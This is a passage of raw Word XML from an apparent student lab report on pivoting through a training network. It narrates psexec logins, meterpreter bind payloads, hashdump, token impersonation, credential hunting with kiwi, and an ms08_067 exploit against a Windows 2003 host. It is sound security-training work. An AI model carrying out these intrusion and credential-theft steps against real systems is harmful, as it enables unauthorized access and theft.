        <w:t xml:space="preserve">After finding the systems on 92 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>network</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007A4D53">
        <w:t xml:space="preserve">. Using my admin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007A4D53">
        <w:t>credentials</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007A4D53">
        <w:t xml:space="preserve"> I created before “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A4D53">
        <w:t>sujit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A4D53">
        <w:t xml:space="preserve">” and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A4D53">
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A4D53">
        <w:t xml:space="preserve"> and payload as bind </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A4D53">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A4D53">
        <w:t xml:space="preserve"> got into the 198.168.92.32.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B698D" w14:textId="6DDA86CD" w:rsidR="007A4D53" w:rsidRDefault="007A4D53" w:rsidP="007A4D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73724E52" wp14:editId="1BAA9ADE">
            <wp:extent cx="4095750" cy="1302239"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1493378183" name="Picture 10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78183" name="Picture 10" descr="A computer screen with white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605" cy="13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9DDA" w14:textId="533FF77A" w:rsidR="007A4D53" w:rsidRDefault="007A4D53" w:rsidP="007A4D53">
      <w:r>
        <w:t>Figure: 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A253591" w14:textId="10E4BD3F" w:rsidR="007A4D53" w:rsidRDefault="007A4D53" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After the session is created </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>looked into</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and found that system is x64 and payload is x86. Because of the mismatch I won’t be able to run hashdump and other </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. To change the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> architecture I used the x64 version </w:t>
      </w:r>
      <w:r w:rsidR="006E3357">
        <w:t xml:space="preserve">of the </w:t>
      </w:r>
      <w:r>
        <w:t>payload “</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4D53">
        <w:t>windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4D53">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A4D53">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4D53">
        <w:t>bind_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="002C3EF2">
        <w:t xml:space="preserve"> and this time I used 92.31 system and got in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AA6327" w14:textId="34C303FD" w:rsidR="007A4D53" w:rsidRDefault="007A4D53" w:rsidP="007A4D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="387CBE94" wp14:editId="495D9145">
            <wp:extent cx="5476875" cy="633117"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1754752583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52583" name="Picture 12" descr="A screenshot of a computer pro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10"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5565054" cy="64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65EA9" w14:textId="61275D3F" w:rsidR="007A4D53" w:rsidRDefault="007A4D53" w:rsidP="007A4D53">
      <w:r>
        <w:t>Figure: 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4ACDE8" w14:textId="2A3276E3" w:rsidR="007A4D53" w:rsidRDefault="00EB376A" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>After getting hashdump looked to fin</w:t>
      </w:r>
      <w:r w:rsidR="002C3EF2">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for any trophies and </w:t>
      </w:r>
      <w:r w:rsidR="002C3EF2">
        <w:t xml:space="preserve">found a file that </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">says hashdump is the trophy. </w:t>
      </w:r>
      <w:r w:rsidR="002C3EF2">
        <w:t>Also,</w:t>
      </w:r>
      <w:r w:rsidR="00461398">
        <w:t xml:space="preserve"> the system did not have any impersonation tokens, It had Window Manager\DWM-1 after impersonating </w:t>
      </w:r>
      <w:r w:rsidR="002C3EF2">
        <w:t xml:space="preserve">it I </w:t>
      </w:r>
      <w:r w:rsidR="00461398">
        <w:t xml:space="preserve">couldn’t find anything new. Used kiwi to look for secretes </w:t>
      </w:r>
      <w:r w:rsidR="00661E4C">
        <w:t xml:space="preserve">and passwords </w:t>
      </w:r>
      <w:r w:rsidR="00C83727">
        <w:t>but couldn’t find any</w:t>
      </w:r>
      <w:r w:rsidR="002C3EF2">
        <w:t xml:space="preserve"> either</w:t>
      </w:r>
      <w:r w:rsidR="00C83727">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE19C3F" w14:textId="098DB9A6" w:rsidR="00C83727" w:rsidRDefault="002C3EF2" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00C83727">
        <w:t xml:space="preserve">pened a route to 192.168.93.0/24 network as the system is also connected to 93 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C83727">
        <w:t>network</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C83727">
        <w:t xml:space="preserve"> as 192.168.93.3</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C83727">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E797C19" w14:textId="4E5CD81E" w:rsidR="00C83727" w:rsidRDefault="00C83727" w:rsidP="00C83727">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="663E21BE" wp14:editId="0AEF0C5F">
            <wp:extent cx="3568093" cy="1452779"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="128079149" name="Picture 1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9149" name="Picture 15" descr="A computer screen with white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654" cy="148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BC5CC" wp14:editId="3D503712">
            <wp:extent cx="2362200" cy="1762102"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1533305526" name="Picture 16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05526" name="Picture 16" descr="A computer screen shot of a black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42" cy="17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1F14" w14:textId="0431B0D5" w:rsidR="00C83727" w:rsidRDefault="00C83727" w:rsidP="00C83727">
      <w:r>
        <w:t>Figure: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C32B26" w14:textId="77777777" w:rsidR="00461398" w:rsidRDefault="00461398" w:rsidP="00461398">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F58D5B8" w14:textId="3668087F" w:rsidR="00461398" w:rsidRDefault="00461398" w:rsidP="00461398">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pivoting to 19</w:t>
      </w:r>
      <w:r w:rsidR="000762AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.168.9</w:t>
      </w:r>
      <w:r w:rsidR="00C83727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C8ACCB" w14:textId="36D7374D" w:rsidR="00461398" w:rsidRDefault="00C83727" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Used same creds I used for </w:t>
      </w:r>
      <w:r w:rsidR="00626A0D">
        <w:t>92.3</w:t>
      </w:r>
      <w:r w:rsidR="002C3EF2">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00626A0D">
        <w:t xml:space="preserve"> to get into 92.1 and found a trophy (hashdump).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78F29F" w14:textId="7710CF42" w:rsidR="00461398" w:rsidRDefault="00461398" w:rsidP="00461398">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39F00C1E" wp14:editId="1E4AF971">
            <wp:extent cx="3571875" cy="4239311"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1043240647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40647" name="Picture 13" descr="A screen shot of a computer cod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34" cy="426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C635F" wp14:editId="24423F59">
            <wp:extent cx="2365782" cy="3677205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1187929958" name="Picture 1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29958" name="Picture 14" descr="A computer screen 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221" cy="37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7721" w14:textId="61FB6E0D" w:rsidR="00461398" w:rsidRDefault="00461398" w:rsidP="00461398">
      <w:r>
        <w:t xml:space="preserve">Figure: </w:t>
      </w:r>
      <w:r w:rsidR="00C83727">
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5239AE83" w14:textId="188FB1E7" w:rsidR="00461398" w:rsidRDefault="00626A0D" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Found nothing useful. No new impersonation token found. And no new secretes.</w:t>
      </w:r>
      <w:r w:rsidR="000762AE">
        <w:t xml:space="preserve"> While my teammate tried to get into 92.135, I started scanning the new 192.168.93.0/24 network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233F2286" w14:textId="77777777" w:rsidR="000762AE" w:rsidRDefault="000762AE" w:rsidP="000762AE"/>
    <w:p w14:paraId="7C6CFA1E" w14:textId="428EC167" w:rsidR="000762AE" w:rsidRDefault="000762AE" w:rsidP="000762AE">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Layer 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00264200"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 xml:space="preserve"> 192.168.92.32 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E203B6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192.168.93.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC44123" w14:textId="77777777" w:rsidR="000762AE" w:rsidRDefault="000762AE" w:rsidP="000762AE"/>
    <w:p w14:paraId="677E9BCC" w14:textId="59C0401E" w:rsidR="000762AE" w:rsidRDefault="000762AE" w:rsidP="000762AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initial exploit (192.168.9</w:t>
      </w:r>
      <w:r w:rsidR="00DA519A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DA519A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7B5E08" w14:textId="77777777" w:rsidR="000762AE" w:rsidRDefault="000762AE" w:rsidP="000762AE"/>
    <w:p w14:paraId="58848904" w14:textId="4F4F9909" w:rsidR="00DA519A" w:rsidRDefault="00DA519A" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Firstly, started with network scan and found there are 93.100, 93.101 and 93.225. Assumed 255 maybe the server so started with 93.100.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E94729D" w14:textId="79DB287E" w:rsidR="00DA519A" w:rsidRDefault="00DA519A" w:rsidP="00DA519A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67AD578B" wp14:editId="6909212F">
            <wp:extent cx="2600325" cy="819922"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5715"/>
            <wp:docPr id="1820303705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03705" name="Picture 18" descr="A screenshot of a computer pr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704" cy="8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9A1A" w14:textId="03CBDC3E" w:rsidR="00DA519A" w:rsidRDefault="00DA519A" w:rsidP="00DA519A">
      <w:r>
        <w:t>Figure: 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DC5750" w14:textId="57C9AC7C" w:rsidR="000762AE" w:rsidRDefault="00DA519A" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After </w:t>
      </w:r>
      <w:r w:rsidR="000E04FC">
        <w:t>few</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> failed attempts with</w:t>
      </w:r>
      <w:r w:rsidR="000E04FC">
        <w:t xml:space="preserve"> different credentials using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E04FC">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E04FC" w:rsidRPr="000E04FC">
        <w:t>ms17_010_psexec</w:t>
      </w:r>
      <w:r w:rsidR="000E04FC">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="000E04FC" w:rsidRPr="000E04FC">
        <w:t>ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidR="000E04FC">
        <w:t xml:space="preserve">. As it </w:t>
      </w:r>
      <w:r w:rsidR="002C3EF2">
        <w:t>shows</w:t>
      </w:r>
      <w:r w:rsidR="000E04FC">
        <w:t xml:space="preserve"> OS mismatch error, tried </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E04FC">
        <w:t>smb_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E04FC">
        <w:t xml:space="preserve"> scan and found its running 2003 SP1 build: 3790 which is a very old </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E04FC">
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E04FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C3EF2">
        <w:t>build</w:t>
      </w:r>
      <w:r w:rsidR="000E04FC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BCA9A5" w14:textId="77777777" w:rsidR="00DA519A" w:rsidRDefault="00DA519A" w:rsidP="00DA519A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="170CF0DF" wp14:editId="42AC5A18">
            <wp:extent cx="5943600" cy="502285"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="19232365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36556" name="Picture 19232365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D2B4" w14:textId="0AF052A9" w:rsidR="00DA519A" w:rsidRDefault="00DA519A" w:rsidP="00DA519A">
      <w:r>
        <w:t>Figure: 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571B4A0E" w14:textId="09F33044" w:rsidR="00DA519A" w:rsidRDefault="000E04FC" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>This version is vulnerable to ms08_067_netapi</w:t>
      </w:r>
      <w:r w:rsidR="002C3EF2">
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. So used this as the exploit with bind </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r w:rsidR="005B0202">
        <w:t>, was successfully able to get into the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C24BE07" w14:textId="4BB45419" w:rsidR="005B0202" w:rsidRDefault="005B0202" w:rsidP="005B0202">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="600B15F3" wp14:editId="33FB16F4">
            <wp:extent cx="5943600" cy="2712085"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="970290562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90562" name="Picture 19" descr="A screenshot of a computer pro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8EEB" w14:textId="0CFAAAC6" w:rsidR="005B0202" w:rsidRDefault="005B0202" w:rsidP="005B0202">
      <w:r>
        <w:t>Figure: 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D75BB0" w14:textId="71F87CF8" w:rsidR="005B0202" w:rsidRDefault="005B0202" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After g</w:t>
      </w:r>
      <w:r w:rsidR="00AE74D2">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00AE74D2">
        <w:t>ting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into the system</w:t>
      </w:r>
      <w:r w:rsidR="00AE74D2">
        <w:t xml:space="preserve"> got the hashdump and using incognito saw available tokens and found a new token “</w:t>
      </w:r>
      <w:r w:rsidR="00AE74D2" w:rsidRPr="00AE74D2">
        <w:t>VICTIM-HTTP\Administrator</w:t>
      </w:r>
      <w:r w:rsidR="00AE74D2">
        <w:t>” before I could impersonate the token connection died.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09995CAD" w14:textId="49AF980B" w:rsidR="005B0202" w:rsidRDefault="005B0202" w:rsidP="005B0202">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7068C385" wp14:editId="3DA66846">
            <wp:extent cx="3238500" cy="1323079"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1100933538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33538" name="Picture 20" descr="A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903" cy="13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3199" w14:textId="3C889E62" w:rsidR="00AE74D2" w:rsidRDefault="00AE74D2" w:rsidP="005B0202">
      <w:r>
        <w:t>Figure: 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE04111" w14:textId="370DDAE3" w:rsidR="005B0202" w:rsidRDefault="00AE74D2" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tried to get it back, didn’t work. Tried to get on 93.101 same issue couldn’t get on and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> services stopped responding on port 445.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A108713" w14:textId="7A3DDC1E" w:rsidR="00AE74D2" w:rsidRDefault="00AE74D2" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>looked into</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E39AE">
        <w:t xml:space="preserve">other </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">available ports on the </w:t>
      </w:r>
      <w:r w:rsidR="002C3EF2">
        <w:t>93.</w:t>
      </w:r>
      <w:r w:rsidR="004E39AE">
        <w:t>100. Found port 80,135,139,1025 and 1027 apart from 445. Looked into possible exploits that could compromise the system via http.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBF42A" w14:textId="0086D03A" w:rsidR="004E39AE" w:rsidRDefault="004E39AE" w:rsidP="004E39AE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="303C11AA" wp14:editId="7B1499F8">
            <wp:extent cx="3619500" cy="1077962"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1321375325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75325" name="Picture 21" descr="A screenshot of a computer scree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353" cy="10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2820C85" wp14:editId="706C29A7">
            <wp:extent cx="1943100" cy="644445"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1786102775" name="Picture 2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02775" name="Picture 22" descr="A black background with white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00" cy="6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C04F" w14:textId="7B660698" w:rsidR="004E39AE" w:rsidRDefault="004E39AE" w:rsidP="004E39AE">
      <w:r>
        <w:t>Figure: 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11022685" w14:textId="79616BFC" w:rsidR="004E39AE" w:rsidRDefault="004E39AE" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Before I could find a way to build an exploit, time for the lab has runout. Didn’t get through </w:t>
      </w:r>
      <w:r w:rsidR="00F22AAA">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r>
        <w:t>93.255</w:t>
      </w:r>
      <w:r w:rsidR="00F22AAA">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F22AAA">
        <w:t xml:space="preserve">Didn’t </w:t>
      </w:r>
      <w:r>
        <w:t>use the available new token or search the 93.100 for trophies</w:t>
      </w:r>
      <w:r w:rsidR="00F22AAA">
        <w:t xml:space="preserve"> due to the error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD11362" w14:textId="77777777" w:rsidR="005F107C" w:rsidRDefault="005F107C" w:rsidP="005F107C"/>
    <w:p w14:paraId="5002AA1D" w14:textId="77777777" w:rsidR="00AA03B0" w:rsidRPr="00AA03B0" w:rsidRDefault="00AA03B0" w:rsidP="00AA03B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA03B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flow Diagram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8CAC90" w14:textId="375978E8" w:rsidR="00326FC5" w:rsidRDefault="00AA03B0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E983F0" wp14:editId="0DC8D933">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5162551</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>177165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1581150" cy="2514600"/>
                <wp:effectExtent l="25400" t="12700" r="44450" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="79159232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514600"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="connsiteX0" fmla="*/ 0 w 1581150"/>
                            <a:gd name="connsiteY0" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX1" fmla="*/ 511238 w 1581150"/>
                            <a:gd name="connsiteY1" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX2" fmla="*/ 990854 w 1581150"/>
                            <a:gd name="connsiteY2" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX3" fmla="*/ 1581150 w 1581150"/>
                            <a:gd name="connsiteY3" fmla="*/ 0 h 2514600"/>
                            <a:gd name="connsiteX4" fmla="*/ 1581150 w 1581150"/>
                            <a:gd name="connsiteY4" fmla="*/ 528066 h 2514600"/>
                            <a:gd name="connsiteX5" fmla="*/ 1581150 w 1581150"/>
                            <a:gd name="connsiteY5" fmla="*/ 980694 h 2514600"/>
                            <a:gd name="connsiteX6" fmla="*/ 1581150 w 1581150"/>
                            <a:gd name="connsiteY6" fmla="*/ 1483614 h 2514600"/>
                            <a:gd name="connsiteX7" fmla="*/ 1581150 w 1581150"/>
                            <a:gd name="connsiteY7" fmla="*/ 1911096 h 2514600"/>
                            <a:gd name="connsiteX8" fmla="*/ 1581150 w 1581150"/>
                            <a:gd name="connsiteY8" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX9" fmla="*/ 1054100 w 1581150"/>
                            <a:gd name="connsiteY9" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX10" fmla="*/ 558673 w 1581150"/>
                            <a:gd name="connsiteY10" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX11" fmla="*/ 0 w 1581150"/>
                            <a:gd name="connsiteY11" fmla="*/ 2514600 h 2514600"/>
                            <a:gd name="connsiteX12" fmla="*/ 0 w 1581150"/>
                            <a:gd name="connsiteY12" fmla="*/ 2036826 h 2514600"/>
                            <a:gd name="connsiteX13" fmla="*/ 0 w 1581150"/>
                            <a:gd name="connsiteY13" fmla="*/ 1533906 h 2514600"/>
                            <a:gd name="connsiteX14" fmla="*/ 0 w 1581150"/>
                            <a:gd name="connsiteY14" fmla="*/ 1005840 h 2514600"/>
                            <a:gd name="connsiteX15" fmla="*/ 0 w 1581150"/>
                            <a:gd name="connsiteY15" fmla="*/ 528066 h 2514600"/>
                            <a:gd name="connsiteX16" fmla="*/ 0 w 1581150"/>
                            <a:gd name="connsiteY16" fmla="*/ 0 h 25146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581150" h="2514600" fill="none" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="190261" y="-11175"/>
                                <a:pt x="266446" y="13623"/>
                                <a:pt x="511238" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
